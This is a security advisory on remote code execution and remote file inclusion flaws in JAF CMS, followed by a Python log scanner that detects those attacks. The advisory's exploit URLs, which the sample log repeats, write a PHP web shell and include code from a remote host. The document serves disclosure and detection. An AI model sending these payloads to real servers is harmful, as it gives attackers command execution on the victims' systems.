High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in JAF CMS which could be exploited to compromise a vulnerable system.
Remote code execution in JAF CMS
The vulnerability exists due to insufficient sanitization of input data in module/log/vislog.php. A remote attacker can create files with arbitrary content within the web root directory and execute them with the privileges of the web server.
Exploitation example:
Creating a malicious file named 123.php:
http://[host]/module/log/vislog.php?_SERVER[%27PHP_SELF%27]=1&from=%3c%3f+system(%24_GET%5b%27cmd%27%5d)%3b+%3f%3e&root=../../123.php%00
Executing arbitrary commands:
http://[host]/123.php?cmd=ls
Remote file inclusion vulnerability in JAF CMS
Input passed to the "website" parameter in module/forum/main.php and module/forum/forum.php is not properly sanitized before being used to include files. A remote attacker can include and execute PHP files from arbitrary locations. Successful exploitation requires that register_globals is set to On.
Exploitation example:
http://[host]/module/forum/main.php?website=http://any_host/any_file%00
http://[host]/module/forum/forum.php?website=http://any_host/any_file%00
This vulnerability was independently discovered by XxX and was assigned CVE-2008-1609.
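As an added example (not part of the advisory or of JAF CMS), a Python routine that flags in web-server access logs the request shapes the two findings describe: a NUL byte (%00) in any parameter, traversal in vislog.php's root parameter, a URL scheme in the forum scripts' website parameter, and a query parameter named after a PHP superglobal. The log lines are constructed; the two attack requests reuse the advisory's own URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not real traffic). The two attack
# requests reuse the advisory's own exploitation URLs; the rest is benign noise.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2010:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2010:10:00:02 +0000] "GET /module/log/vislog.php?_SERVER[%27PHP_SELF%27]=1&from=%3c%3f+system(%24_GET%5b%27cmd%27%5d)%3b+%3f%3e&root=../../123.php%00 HTTP/1.1" 200 88
10.0.0.9 - - [01/Mar/2010:10:00:03 +0000] "GET /123.php?cmd=ls HTTP/1.1" 200 301
10.0.0.7 - - [01/Mar/2010:10:00:04 +0000] "GET /module/forum/main.php?website=http://any_host/any_file%00 HTTP/1.1" 200 77
10.0.0.8 - - [01/Mar/2010:10:00:05 +0000] "GET /module/forum/forum.php?website=index HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*? "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
# A query parameter named after a PHP superglobal (the _SERVER[...] in the
# advisory URL) has no legitimate use: it is a register_globals override attempt.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_REQUEST", "_SESSION", "_ENV", "_FILES"}

def analyze_target(target):
    """Return finding labels for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes names and values, so %00 arrives here as a real NUL.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        if name.split("[", 1)[0] in SUPERGLOBALS:
            findings.append(f"superglobal override via parameter {name!r}")
        if any("\x00" in v for v in values):
            findings.append(f"null-byte truncation in parameter {name!r}")
    if path.endswith("/module/log/vislog.php") and any(
            "../" in v or "..\\" in v for v in params.get("root", [])):
        findings.append("path traversal in vislog.php root parameter")
    if path.endswith(("/module/forum/main.php", "/module/forum/forum.php")) and any(
            URL_SCHEME_RE.match(v) for v in params.get("website", [])):
        findings.append("remote file inclusion via website parameter")
    return findings

def scan_log(text):
    """Return (client_ip, target, findings) for each request that triggers a rule.
    The follow-on '/123.php?cmd=ls' request looks benign on its own, which is
    why the file-creating vislog.php request has to be caught when it happens."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (findings := analyze_target(m.group("target"))):
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits
```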